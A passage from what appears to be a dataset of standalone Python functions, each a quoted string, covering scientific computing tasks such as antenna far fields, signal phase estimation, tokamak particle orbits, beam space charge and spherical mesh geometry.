Define the theta-component of the magnetic field\n h_theta = 1j * k / (4.0 * pi * r) * exp(-1j * k * r) * -cos(phi) * (1.0 + cos(theta)) / eta * \\\n I1(k, horn_width, hplane_effective_length, theta, phi) * \\\n I2(k, horn_height, eplane_effective_length, theta, phi)\n\n # Define the phi-component of the magnetic field\n h_phi = 1j * k / (4.0 * pi * r) * exp(-1j * k * r) * sin(phi) * (1.0 + cos(theta)) / eta * \\\n I1(k, horn_width, hplane_effective_length, theta, phi) * \\\n I2(k, horn_height, eplane_effective_length, theta, phi)\n\n # Return all six components of the far field\n return e_r, e_theta, e_phi, h_r, h_theta, h_phi", "def phaseEstimator(phases,omegas,T_s,k):\n length = phases.shape[0]\n pis = np.tile(2*np.pi,length)\n a = phases - T_s*k*omegas\n phaseShifts = np.mod(a,pis)\n b = phases-phaseShifts\n omega_hat = np.mod(b,pis)\n n = omega_hat/omegas\n estimatedTime = np.sum(n)/length\n \n estimatedPhase = phaseShifts + estimatedTime*omegas\n \n return estimatedPhase", "def COM_a4(fname, Ekev, debug=0, plot=1):\n b = a4b.Bfield_ascot(fname)\n E=Ekev*1000*1.602e-19\n \n # Getting psi_2d (Normalized to edge and axis value) and interpolate it\n psiw = b.psiedge[0]; psia=b.psiaxis[0];\n # TEMPORARY FIX\n psia=-psia;\n #\n zaxis=b.vardict['zaxis']\n _R = b.R\n _z = b.z\n psi2d_param = interp.interp2d(_R, _z, (b.psi-psia)/(psiw-psia))\n #psi2d_param_notnorm = interp.interp2d(_R, _z, eq.psi)\n # Finding the axis R0 of the device, which is the one to use to normalize\n R0 = _R[np.argmin(psi2d_param(_R,zaxis))]\n psi_on_midplane = psi2d_param(_R,zaxis)\n R = _R[psi_on_midplane<1.] #R on midplane inside lcfs\n #T is as function of psi (equidistant)\n B = b.Bphi\n #Forcing B to be positive and decreasing in R\n B = np.abs(B)\n B_param = interp.interp2d(_R, _z, B)\n Bmin = np.min(B_param(R,zaxis)); Bmax=np.max(B_param(R,zaxis))\n\n T_on_midplane = B_param(R,zaxis)*R\n T_param = interp.interp1d(R, T_on_midplane)\n\n Rmin = min(R); Rmax=max(R)\n B0 = B_param(R0, zaxis)[0]\n #finding also extrema of g\n g_param=T_param\n gedge = np.abs(g_param(Rmax))\n g0 = np.abs(g_param(R0))\n # We want psi increasing from 0 to psi_wall\n psi=np.linspace(0,1, np.size(_R))\n print(psia, psiw)\n if psiw<psia or psiw<=0 or psia<0:\n psiw-=psia; psi-=psia; psia-=psia; # now stuff set from 0 to something.\n if psiw<0: \n psiw=psiw*-1.; psi*=-1;\n ####################################################################\n #print values for debugging\n if debug:\n print('Rmin={:.2f}; Rmax={:.2f}; R={:.2f}'.format(Rmin, Rmax, R0))\n print('Bmin={:.2f}; Bmax={:.2f}; B={:.2f}'.format(Bmin, Bmax, B0))\n print('gax={:.2f}; gedge={:.2f}; B0R0={:.2f}'.format(g0, gedge, R0*B0))\n print('psiw={:.2f}; psiax={:.2f}'.format(psiw, psia))\n \n # get normalized units\n mp=1.67e-27; q=1.602e-19;\n A=2; Z=1;\n R_notnorm=np.copy(R); \n B/=B0; Bmin/=B0; Bmax/=B0; #normalizing B\n R/=R0; Rmin/=R0; Rmax/=R0; #Normalizing R\n gedge = gedge/(R0*B0)\n g0 = g0/(R0*B0)\n psiw = psiw/(R0*R0*B0)\n psia = psia/(R0*R0*B0)\n psi = psi/(R0*R0*B0)\n E = E*mp*A/(Z*Z*q*q*R0**2*B0**2)\n\n #print values for debugging\n if debug:\n print('After normalization')\n print('Bmin={:.2f}; Bmax={:.2f}; B={:.2f}'.format(Bmin, Bmax, B0))\n print('gax={:.2f}; gedge={:.2f}; B0R0={:.2f}'.format(g0, gedge, R0*B0))\n print('psiw={:.2f}; psiax={:.2f}; psi={:.2f}'.format(psiw, psia, np.mean(psi)))\n print('E={:.2e}'.format(E)) #E Looks ok.\n print()\n print('zero with bmin {:.3f}'.format(-1-np.sqrt(2*E)*gedge/(psiw*Bmin)))\n print('zero with bmin {:.3f}'.format(-1+np.sqrt(2*E)*gedge/(psiw*Bmin)))\n print('max with Bmin {:.3f}'.format(1/Bmin))\n print('zero with bmax {:.3f}'.format(-1-np.sqrt(2*E)*gedge/(psiw*Bmax)))\n print('zero with bmax {:.3f}'.format(-1+np.sqrt(2*E)*gedge/(psiw*Bmax)))\n print('max with Bmax {:.3f}'.format(1/Bmax))\n\n # Defining p_xi/psi_W\n x = np.linspace(-2., 1, 500)\n #Right hand edge of midplane\n #These functions should plot mu/E. You must retrieve mu/E from equations at page\n # 85 of RW book\n copss_lost = 1./Bmin-(1.+x)**2*(Bmin*psiw*psiw)/(2*gedge*gedge*E)\n # copss_lost*B0=1/(Bmin)-(Bmin/2.)*(psi**2*(1+x)**2)/(2*(R0*B0*gedge)**2*E)\n cntrpss_lost = 1/Bmax-(Bmax)*(psiw**2*(1+x)**2)/(2*gedge**2*E)\n magaxis = 1-(x*psiw)**2/(2*E*g0**2)\n #Normalization\n #Trapped/passing boundary - UPPER\n trpp_up={}\n #step 1: find R(z=0, theta=0) at the psi wanted\n psi_z0 = psi2d_param(R_notnorm[R_notnorm>=R0], 0)\n #Normalization\n psi_z0 = np.abs(psi_z0/R0*R0*B0)\n psi_z0 = psi_z0[psi_z0<1.]\n trpp_up['x'] = -1.*psi_z0;\n \n # step 2 : find B at the R>R0, with normalizations\n B_theta0 = B_param(np.linspace(R0, max(R_notnorm), np.size(psi_z0)), 0); B_theta0/=B0;\n trpp_up['y'] = (1./B_theta0);\n \n #Trapped/passing boundary - LOWER\n trpp_down={}\n #step 1: find R(z=0, theta=pi) at the psi wanted\n psi_zpi = psi2d_param(R_notnorm[R_notnorm<=R0], 0)\n #Normalization\n psi_zpi = np.abs(psi_zpi/R0*R0*B0)\n psi_zpi = psi_zpi[psi_zpi<1.]\n trpp_down['x'] = -1.*psi_zpi;\n # step 2 : find B at the R>R0, with normalizations\n B_thetapi = B_param(np.linspace(min(R_notnorm), R0, np.size(psi_zpi)), 0); B_thetapi/=B0;\n trpp_down['y'] = (1/B_thetapi);\n\n if plot:\n f=plt.figure(figsize=(8,6))\n ax=f.add_subplot(111)\n ax.plot(x, copss_lost, 'k')\n ax.plot(x, cntrpss_lost,'k')\n ax.plot(x, magaxis,'b')\n ax.plot(trpp_up['x'], trpp_up['y'],'r')\n ax.plot(trpp_down['x'], trpp_down['y'],'r')\n ax.plot([-1,-1], [max(copss_lost), max(cntrpss_lost)], 'k--')\n ax.set_title(r'E={:.2f} keV'.format(Ekev))\n ax.set_xlabel(r'P$_\\phi$/$\\psi_w$')\n ax.set_ylabel(r'$\\mu\\frac{B_0}{E}$')\n ax.set_ylim([0, 1.5]); ax.set_xlim([-2, 1.])\n ax.grid('on')\n f.tight_layout()\n #f.savefig('COM_{:s}_E{:.2f}.png'.format(fname_eqdsk, Ekev), dpi=800)\n plt.show()\n \n return b, R0, B0", "def end_phase():\n pass", "def iq_phase_trim(self):\n return (self._read(0x14, 0, 0xFF) << 1) | self._read(0x15, 7, 0x80)", "def get_spectral_phase_expansion(self, orders=4, prefix=1e12):\n if self.Et is not None:\n w = self.w\n ph = self.get_trace_spectral_phase()\n ph_ind = np.isfinite(ph)\n ph_good = ph[ph_ind]\n w_good = w[ph_ind] / prefix\n ph_poly = np.polyfit(w_good, ph_good, orders)\n else:\n ph_poly = None\n return ph_poly", "def estimate_phase(img_ft, sim_frq, dxy):\n ny, nx = img_ft.shape\n fx = tools.get_fft_frqs(nx, dxy)\n fy = tools.get_fft_frqs(ny, dxy)\n\n phase = np.mod(np.angle(tools.get_peak_value(img_ft, fx, fy, sim_frq, 2)), 2*np.pi)\n\n return phase", "def test_dphase(self):\n model = BDF(debug=False)\n node1, c1, t1 = 100, 3, 0.3\n node2, c2, t2 = 101, 4, 0.4\n sid = 42\n card_lines = ['DPHASE', sid, node1, c1, t1, node2, c2, t2]\n model.add_card(card_lines, card_lines[0], comment='', is_list=True,\n has_none=True)\n model.add_grid(100, [0., 0., 0.])\n model.add_grid(101, [0., 0., 0.])\n model.validate()\n model.cross_reference()\n #print(model.dphases[42])\n save_load_deck(model)", "def dihedral_calculator():\n\n\t# Prime with first 3 points\n\tp1 = Vector3((yield None))\n\tp2 = Vector3((yield None))\n\tp3 = Vector3((yield None))\n\n\t# Set up for first angle\n\tlastpoint = p3\n\tlastdisp = p3 - p2\n\tlastnormal = ((p2 - p1) @ lastdisp).normalize()\n\n\tangle = None\n\n\t# For each point starting with the 4th, we can compute a new angle\n\twhile True:\n\n\t\t# Yield the last angle (None the first time), get the next point\n\t\tnextpoint = Vector3((yield angle))\n\n\t\t# Displacement from previous point to current\n\t\tnextdisp = nextpoint - lastpoint\n\n\t\t# Normal vector to plane containing last 3 points\n\t\tnextnormal = (lastdisp @ nextdisp).normalize()\n\n\t\t# This one's complicated... see step 3 in source.\n\t\tx = lastnormal * nextnormal\n\t\ty = (lastnormal @ lastdisp.normalize()) * nextnormal\n\t\tangle = -math.atan2(y, x)\n\n\t\t# Current values used as previous in next loop\n\t\tlastpoint = nextpoint\n\t\tlastdisp = nextdisp\n\t\tlastnormal = nextnormal", "def get_space_charge_spect( spect, gamma, direction='forward' ) :\n # Speed of the beam\n beta = np.sqrt(1.-1./gamma**2)\n\n # Propagation direction of the beam\n if direction == 'backward':\n beta *= -1.\n\n # Get the denominator\n K2 = spect.kr**2 + spect.kz**2 * 1./gamma**2\n K2_corrected = np.where( K2 != 0, K2, 1. )\n inv_K2 = np.where( K2 !=0, 1./K2_corrected, 0. )\n\n # Get the potentials\n phi = spect.rho_next[:,:]*inv_K2[:,:]/epsilon_0\n Ap = spect.Jp[:,:]*inv_K2[:,:]*mu_0\n Am = spect.Jm[:,:]*inv_K2[:,:]*mu_0\n Az = spect.Jz[:,:]*inv_K2[:,:]*mu_0\n\n # Deduce the E field\n spect.Ep[:,:] += 0.5*spect.kr * phi + 1.j*beta*c*spect.kz * Ap\n spect.Em[:,:] += -0.5*spect.kr * phi + 1.j*beta*c*spect.kz * Am\n spect.Ez[:,:] += -1.j*spect.kz * phi + 1.j*beta*c*spect.kz * Az\n\n # Deduce the B field\n spect.Bp[:,:] += -0.5j*spect.kr * Az + spect.kz * Ap\n spect.Bm[:,:] += -0.5j*spect.kr * Az - spect.kz * Am\n spect.Bz[:,:] += 1.j*spect.kr * Ap + 1.j*spect.kr * Am", "def phase_center(self):\n try:\n rx_number = extract_channel_number(self.title)\n ph_center = (_np.array(self.GPRI_tx_coord) + _np.array(\n getattr(self, \"GPRI_rx{num}_coord\".format(num=rx_number)))) / 2\n return ph_center\n except AttributeError:\n return 0", "def phasefold(t, P, t0, starting_phase=-0.5):\n t = np.array(t)\n dt = t0shft( np.array(t), P, t0)\n tshift = t + dt\n t_phasefold = np.mod(tshift - starting_phase*P, P) + starting_phase * P\n phase = t_phasefold / P\n cycle = np.floor(tshift/P - starting_phase).astype(int)\n return t_phasefold, phase, cycle", "def mounting_matrix(self):\n # fmt: off\n count = 0\n for x in range(self.ntheta):\n self.M[count][count] = 1\n self.f[count][0] = self.p_in\n count = count + self.nz - 1\n self.M[count][count] = 1\n self.f[count][0] = self.p_out\n count = count + 1\n count = 0\n for x in range(self.nz - 2):\n self.M[self.ntotal - self.nz + 1 + count][1 + count] = 1\n self.M[self.ntotal - self.nz + 1 + count][self.ntotal - self.nz + 1 + count] = -1\n count = count + 1\n count = 1\n j = 0\n for i in range(1, self.nz - 1):\n a = (1 / self.dtheta ** 2) * (self.c1[i][self.ntheta - 1])\n self.M[count][self.ntotal - 2 * self.nz + count] = a\n b = (1 / self.dz ** 2) * (self.c2[i - 1, j])\n self.M[count][count - 1] = b\n c = -((1 / self.dtheta ** 2) * ((self.c1[i][j]) + self.c1[i][self.ntheta - 1])\n + (1 / self.dz ** 2) * (self.c2[i][j] + self.c2[i - 1][j]))\n self.M[count, count] = c\n d = (1 / self.dz ** 2) * (self.c2[i][j])\n self.M[count][count + 1] = d\n e = (1 / self.dtheta ** 2) * (self.c1[i][j])\n self.M[count][count + self.nz] = e\n count = count + 1\n count = self.nz + 1\n for j in range(1, self.ntheta - 1):\n for i in range(1, self.nz - 1):\n a = (1 / self.dtheta ** 2) * (self.c1[i, j - 1])\n self.M[count][count - self.nz] = a\n b = (1 / self.dz ** 2) * (self.c2[i - 1][j])\n self.M[count][count - 1] = b\n c = -((1 / self.dtheta ** 2) * ((self.c1[i][j]) + self.c1[i][j - 1])\n + (1 / self.dz ** 2) * (self.c2[i][j] + self.c2[i - 1][j]))\n self.M[count, count] = c\n d = (1 / self.dz ** 2) * (self.c2[i][j])\n self.M[count][count + 1] = d\n e = (1 / self.dtheta ** 2) * (self.c1[i][j])\n self.M[count][count + self.nz] = e\n count = count + 1\n count = count + 2\n count = 1\n for j in range(self.ntheta - 1):\n for i in range(1, self.nz - 1):\n if j == 0:\n self.f[count][0] = (self.c0w[i][j] - self.c0w[i][self.ntheta - 1]) / self.dtheta\n else:\n self.f[count][0] = (self.c0w[i, j] - self.c0w[i, j - 1]) / self.dtheta\n count = count + 1\n count = count + 2\n # fmt: on", "def grad_phi_mesh(self):\n fy = -0.5 * (np.roll(self.phi, 1, axis = 1) - np.roll(self.phi, -1, axis=1)) \n fx = -0.5 * (np.roll(self.phi, 1, axis = 0) - np.roll(self.phi, -1, axis=0))\n return fx,fy", "def focus_field_beam_plane(shape = (128,128),\n units = (.1,.1),\n z = 0.,\n lam = .5, NA = .6, n0 = 1.,\n ex_g = None,\n n_integration_steps = 200):\n\n\n p = OCLProgram(absPath(\"kernels/psf_debye.cl\"),\n build_options = [\"-I\",absPath(\"kernels\"),\"-D\",\"INT_STEPS=%s\"%n_integration_steps])\n\n if np.isscalar(NA):\n NA = [0.,NA]\n\n Nx, Ny = shape\n dx, dy = units\n\n alphas = np.arcsin(np.array(NA)/n0)\n assert len(alphas)%2 ==0\n\n if ex_g is None:\n use_buffer = False\n ex_g = OCLArray.empty((Ny,Nx),np.complex64)\n else:\n use_buffer = True\n\n assert ex_g.shape[::-1] == shape\n\n alpha_g = OCLArray.from_array(alphas.astype(np.float32))\n\n t = time.time()\n\n p.run_kernel(\"debye_wolf_plane\",(Nx,Ny),None,\n ex_g.data,\n np.float32(1.),np.float32(0.),\n np.float32(-(Nx//2)*dx),np.float32((Nx-1-Nx//2)*dx),\n np.float32(-(Ny//2)*dy),np.float32((Ny-1-Ny//2)*dy),\n np.float32(-z),\n np.float32(lam/n0),\n alpha_g.data, np.int32(len(alphas)))\n\n print(\"time in secs:\" , time.time()-t)\n\n if not use_buffer:\n return ex_g.get()", "def step(self):\n lmax = 32\n\n star = self.star\n\n K, N = star.mesh_size\n mu = star.mu_coords\n r = star.r_coords\n\n def D1(k, n):\n return 1 / 6 * np.sum((mu[2::2] - mu[:-2:2]) *\n (eval_legendre(2 * n, mu[:-2:2]) * star.rho[:-2:2, k] +\n 4 * eval_legendre(2 * n, mu[1:-1:2]) * star.rho[1:-1:2, k] +\n eval_legendre(2 * n, mu[2::2]) * star.rho[2::2, k]))\n\n def D2(n, j):\n sum = 0\n\n def fl(r_dash, r, l=2 * n):\n if r_dash < r:\n return r_dash**(l + 2) / r**(l + 1)\n else:\n return r**l / r_dash**(l - 1)\n\n for k in range(0, N - 2, 2):\n sum += (r[k + 2] - r[k]) * (fl(r[k], r[j]) * D1(k, n) +\n 4 * fl(r[k + 1], r[j]) * D1(k + 1, n) +\n fl(r[k + 2], r[j]) * D1(k + 2, n))\n\n return sum / 6\n\n def calc_Phi(i, j):\n Phi = 0\n\n for n in range(lmax + 1):\n Phi -= 4 * np.pi * D2(n, j) * eval_legendre(2 * n, mu[i])\n\n return Phi\n\n # calculate Phi across grid\n for n in range(N):\n for k in range(K):\n star.Phi[k, n] = calc_Phi(k, n)\n\n # print(f'Phi = {star.Phi[0,:]}')\n\n # update the enthalpy\n\n Omega2 = star.eos.Omega2(star.Phi, star.Psi)\n C = star.eos.C(star.Phi, star.Psi)\n\n H = C - star.Phi - Omega2 * star.Psi\n\n # use new enthalpy and Phi to calculate the density\n\n star.rho = star.eos.rho_from_h(H)\n star.rho /= np.max(star.rho)\n\n # print(f\"rho = {np.average(star.rho, axis=0)}\")\n\n # calculate the errors\n\n H_err = np.max(np.abs(H - star.H)) / np.max(np.abs(H))\n\n if np.max(Omega2) == 0:\n if np.abs(Omega2 - star.Omega2) == 0:\n Omega2_err = 0\n else:\n Omega2_err = 1\n else:\n Omega2_err = np.abs(Omega2 - star.Omega2) / np.abs(Omega2)\n\n if np.max(star.C) == 0:\n if np.abs(C - star.C) == 0:\n C_err = 0\n else:\n C_err = 1\n else:\n C_err = np.abs(C - star.C) / np.abs(star.C)\n\n # set variables to new values\n\n star.H = H\n star.Omega2 = Omega2\n star.C = C\n print(\n f\"Errors: H_err = {H_err}, Omega2_err = {Omega2_err}, C_err = {C_err}\")\n\n return H_err, Omega2_err, C_err", "def d4in():\n\td4x.moveTo(d4x_in)\n\td4y.moveTo(d4y_in)", "def Sphere_ExactSerendipityLagrangeQuad():\n\n mesh = Sphere_CubeToSerendipityLagrangeQuad(1)\n \n ################\n # Modifications for exact sphere\n ################\n # x=+1 side\n def posXvals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.ones(xi1.shape);yb=np.array(-xi1);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n x = xb*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n y = yb*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n z = zb*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n return np.vstack([x,y,z])\n def posXnormals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.ones(xi1.shape);yb=np.array(-xi1);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = -1.0 * xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dxdxi2 = 1.0 * xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-zb+2.0*yy*zb/3.0)\n dydxi1 = -1.0 * np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dydxi2 = 1.0 * yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-zb+2.0*xx*zb/3.0)\n dzdxi1 = -1.0 * zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n dzdxi2 = 1.0 * np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n magnitude = np.sqrt(np.sum(J**2,axis=1))\n return J.T/magnitude\n def posXJ(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.ones(xi1.shape);yb=np.array(-xi1);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = -1.0 * xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dxdxi2 = 1.0 * xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-zb+2.0*yy*zb/3.0)\n dydxi1 = -1.0 * np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dydxi2 = 1.0 * yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-zb+2.0*xx*zb/3.0)\n dzdxi1 = -1.0 * zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n dzdxi2 = 1.0 * np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n return np.sqrt(np.sum(J**2,axis=1))\n mesh.eList[0].vals = posXvals\n mesh.eList[0].normals = posXnormals\n mesh.eList[0].J = posXJ\n \n def posYvals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.ones(xi1.shape);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n x = xb*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n y = yb*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n z = zb*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n return np.vstack([x,y,z])\n def posYnormals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.ones(xi1.shape);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-zb+2.0*yy*zb/3.0)\n dydxi1 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-xb+2.0*xb*zz/3.0)\n dydxi2 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-zb+2.0*xx*zb/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-xb+2.0*xb*yy/3.0)\n dzdxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n magnitude = np.sqrt(np.sum(J**2,axis=1))\n return J.T/magnitude\n def posYJ(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.ones(xi1.shape);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-zb+2.0*yy*zb/3.0)\n dydxi1 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-xb+2.0*xb*zz/3.0)\n dydxi2 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-zb+2.0*xx*zb/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-xb+2.0*xb*yy/3.0)\n dzdxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n return np.sqrt(np.sum(J**2,axis=1))\n mesh.eList[1].vals = posYvals\n mesh.eList[1].normals = posYnormals\n mesh.eList[1].J = posYJ\n \n # x=-1 side\n def negXvals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=-np.ones(xi1.shape);yb=np.array(xi1);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n x = xb*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n y = yb*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n z = zb*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n return np.vstack([x,y,z])\n def negXnormals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=-np.ones(xi1.shape);yb=np.array(xi1);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dxdxi2 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-zb+2.0*yy*zb/3.0)\n dydxi1 = 1.0*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dydxi2 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-zb+2.0*xx*zb/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n dzdxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n magnitude = np.sqrt(np.sum(J**2,axis=1))\n return J.T/magnitude\n def negXJ(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=-np.ones(xi1.shape);yb=np.array(xi1);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dxdxi2 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-zb+2.0*yy*zb/3.0)\n dydxi1 = 1.0*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dydxi2 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-zb+2.0*xx*zb/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n dzdxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n return np.sqrt(np.sum(J**2,axis=1))\n mesh.eList[2].vals = negXvals\n mesh.eList[2].normals = negXnormals\n mesh.eList[2].J = negXJ\n\n # y=-1 side\n def negYvals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(-xi1);yb=-np.ones(xi1.shape);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2;\n x = xb*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n y = yb*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n z = zb*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n return np.vstack([x,y,z])\n def negYnormals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(-xi1);yb=-np.ones(xi1.shape);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2; \n dxdxi1 = -1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = 1.0*0.5*xb*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5*(-zb+2.0*yy*zb/3.0)\n dydxi1 = -1.0*0.5*yb*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5*(-xb+2.0*xb*zz/3.0)\n dydxi2 = 1.0*0.5*yb*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5*(-zb+2.0*xx*zb/3.0)\n dzdxi1 = -1.0*0.5*zb*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5*(-xb+2.0*xb*yy/3.0)\n dzdxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0) \n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n magnitude = np.sqrt(np.sum(J**2,axis=1))\n return J.T/magnitude\n def negYJ(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(-xi1);yb=-np.ones(xi1.shape);zb=np.array(xi2);\n xx=xb**2;yy=yb**2;zz=zb**2; \n dxdxi1 = -1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = 1.0*0.5*xb*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5*(-zb+2.0*yy*zb/3.0)\n dydxi1 = 